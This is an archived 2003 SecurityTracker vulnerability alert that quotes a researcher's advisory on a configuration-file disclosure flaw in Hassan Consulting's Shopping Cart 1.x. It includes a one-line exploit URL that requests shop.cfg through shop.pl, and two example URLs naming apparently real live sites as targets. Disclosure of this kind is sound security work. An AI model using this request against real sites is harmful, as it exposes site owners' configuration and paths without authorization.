Hassan Shopping Cart Discloses Configuration Data to Remote Users
|
|
SecurityTracker Alert ID: 1007322
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 28 2003
|
Impact: Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 1.x
|
Description: Dr`Ponidi of the Indonesia Security Development Team reported an information disclosure vulnerability in 'The Shopping Cart' from Hassan Consulting. A remote user can view the configuration file.
It is reported that a remote user can request the 'shop.cfg' file from the target web site. A demonstration exploit is provided:
http://[target]/[cgi-local]/shop.pl/page=shop.cfg
|
Impact: A remote user can view shopping cart configuration data, including the installation path.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.irata.com/products.html (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: Dr`Ponidi Haryanto <drponidi@hackermail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 28 Jul 2003 14:58:48 +0800
From: Dr`Ponidi Haryanto <drponidi@hackermail.com>
Subject: Hassan Consulting's Shopping Cart Version 1.x Path Disclosure
|
Indonesia Security Development Team Advisory
Hassan Consulting's Shopping Cart Version 1.x Path Disclosure
=============================================================================
Advisory Name: Hassan Consulting's Shopping Cart Version 1.x Path Disclosure
Release Date: 8:31 28/07/03
Application: Hassan Consulting's Shopping Cart Version 1.x
BUG Type: Security Leak
Author: Dr`Ponidi <drponidi@indonesia.or.id>
Discover by: Dr`Ponidi <drponidi@indonesia.or.id>
Acknowledgments : Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
Vendor Status: See below.
Vendor URL: http://www.irata.com
Reference: http://drponidi.5u.com/advisory
Greetz to: #xnuxer,#phracker,#dhegleng,#k-elektronik @ irc.dal.net
[Details]
Simple Path disclosure, directory transversal with file read ability,
and listing of files in all directorys in somecases.Just depends on version of the code.
[Exploit]
http://[www.target.com]/[cgi-local]/[shop.pl]/[shop.cfg]
[Example]
http://www.startthehealing.com/cgi-local/shop.pl/page=shop.cfg
http://aaaim.com/cgi-local/shop991/shop.pl/page=shop.cfg
[About Indonesia Security Development Team]
Indonesia Security Development Team, research and develop intelligent, advanced application
security assessment.Based in Indonesia, Indonesia Security Development Team offers best of
breed security consulting services, specialising in shopping carts software and network
security assessments.We provides security information and patches for use by the entire
security network community.
This information is provided freely to all interested parties and may be redistributed
provided
that it is not altered in any way, Author is appropriately credited and the document retains.
Indonesia Security Development Team Advisory:
http://drponidi.5u.com/advisory
___________________________________________________________________________________________
Dr`Ponidi <drponidi@indonesia.or.id>
Original document can be fount at http://drponidi.5u.com/advisory
--
_______________________________________________
Get your free email from http://www.hackermail.com
Powered by Outblaze
|
|
